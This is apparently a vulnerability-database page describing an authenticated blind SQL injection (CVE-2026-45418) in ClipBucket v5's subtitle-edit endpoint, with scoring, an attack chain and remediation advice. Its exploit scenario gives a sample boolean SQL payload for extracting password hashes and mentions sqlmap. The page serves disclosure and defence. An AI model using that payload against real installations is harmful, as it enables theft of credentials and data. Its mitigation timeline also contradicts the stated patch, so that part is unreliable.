What is the CVSS score of CVE-2026-45418?

CVE-2026-45418 has a CVSS 3.1 base score of 8.8 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of ClipBucket v5 are affected by CVE-2026-45418?

ClipBucket v5 prior to version 5.5.3 contains an authenticated SQL injection vulnerability (GHSA-q233-m544-6jqr) that allows any user with video upload privileges to exfiltrate entire database…

How to fix or mitigate CVE-2026-45418?

24 hours: Inventory all ClipBucket v5 instances and confirm affected versions (< 5.5.3); restrict video-upload user role to critical personnel only. 7 days: Deploy Web Application Firewall rules to block SQL injection patterns in POST requests to /actions/subtitle_edit.php; enable database query logging and set alerts for bulk data extraction attempts. 30 days: Monitor ClipBucket releases for patch availability (version 5.5.3 or later); upon release, test in staging and deploy to production following change management procedures.

ClipBucket v5 CVE-2026-45418

HIGH

SQL Injection (CWE-89)

2026-06-11 GitHub_M

PHP SQLi Information Disclosure Clipbucket V5

8.8

CVSS 3.1 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M) PRIMARY

8.8 HIGH

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

vuln.today AI

8.8 HIGH

Network-reachable PHP endpoint (AV:N), straightforward blind SQLi (AC:L), requires an uploader account so PR:L, no victim interaction, full DB read/write yields C:H/I:H/A:H.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Analysis Generated

Jun 11, 2026 - 23:15 vuln.today

DescriptionCVE.org

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #132, any authenticated user who can upload videos can add multiple subtitles from different files and change their title (English, Spanish...). The POST /actions/subtitle_edit.php request used to change their title includes a number parameter which is vulnerable to SQL Injection. A boolean-based blind SQL injection can be used to exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #132.

AnalysisAI

Authenticated SQL injection in ClipBucket v5 prior to release 5.5.3 - #132 allows any user with video-upload privileges to exfiltrate database contents via the POST /actions/subtitle_edit.php endpoint. The vulnerable 'number' parameter handling enables boolean-based blind SQLi, and no public exploit is identified at time of analysis though the GitHub Security Advisory (GHSA-q233-m544-6jqr) documents the issue in detail.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Delivery

Upload video and attach subtitle

Exploit

Send crafted POST to /actions/subtitle_edit.php with malicious number parameter

Execution

Trigger boolean-blind SQL injection

Persist

Iteratively exfiltrate database rows

Impact

Escalate using recovered credentials or tokens

Access

Delivery

Upload video and attach subtitle

Exploit

Send crafted POST to /actions/subtitle_edit.php with malicious number parameter

Execution

Trigger boolean-blind SQL injection

Persist

Iteratively exfiltrate database rows

Impact

Escalate using recovered credentials or tokens

Vulnerability AssessmentAI

Exploitation	Attacker must hold an authenticated ClipBucket v5 account with permission to upload videos and to attach subtitle files (the feature gating the vulnerable endpoint); the target instance must be running a ClipBucket v5 build older than 5.5.3 - #132 and expose /actions/subtitle_edit.php to the authenticated user. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H scores 8.8 (High) and aligns with a network-reachable, low-complexity injection requiring only low privileges - any account permitted to upload videos. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker registers or compromises a low-privilege account that can upload videos, uploads a video with a subtitle file, then issues a crafted POST to /actions/subtitle_edit.php where the 'number' parameter carries boolean SQL payloads (e.g., AND SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a'); response differences allow byte-by-byte extraction of password hashes, session tokens, or other sensitive table contents. No public exploit identified at time of analysis, but the blind boolean primitive is straightforward to automate with tools like sqlmap.
Remediation	Vendor-released patch: upgrade ClipBucket v5 to release 5.5.3 - #132 or later, per advisory GHSA-q233-m544-6jqr (https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-q233-m544-6jqr). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Inventory all ClipBucket v5 instances and confirm affected versions (< 5.5.3); restrict video-upload user role to critical personnel only. …

Threat intelligence, references, and detailed analysis are available after sign-in.